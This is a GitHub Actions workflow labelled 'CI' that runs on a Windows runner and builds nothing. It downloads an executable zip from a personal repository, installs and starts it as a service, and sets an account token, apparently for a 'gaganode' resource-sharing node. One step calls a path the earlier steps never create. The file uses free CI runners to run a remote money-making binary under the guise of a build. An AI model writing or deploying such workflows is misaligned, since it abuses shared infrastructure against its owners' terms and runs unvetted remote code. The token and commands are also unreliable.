name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download
      run: Invoke-WebRequest https://github.com/sahalfreelance/gakun/raw/main/app-windows-amd64.zip -OutFile app-windows-amd64.zip
    - name: Extract
      run: Expand-Archive app-windows-amd64.zip
    - name: Install
      run: .\app-windows-amd64\app.exe service install
    - name: Start
      run: .\app-windows-amd64\app.exe service start
    - name: SetAddress
      run: .\app-windows-amd64\app.exe config set token=qvaxpcypacrdqtksfjiuwiyl
    - name: Restart
      run: .\app-windows-amd64\app.exe restart
    - name: SetAgain
      run: .\apps\gaganode\gaganode.exe config set --token=qvaxpcypacrdqtksfjiuwiyl
    - name: Restart
      run: .\app-windows-amd64\app.exe restart
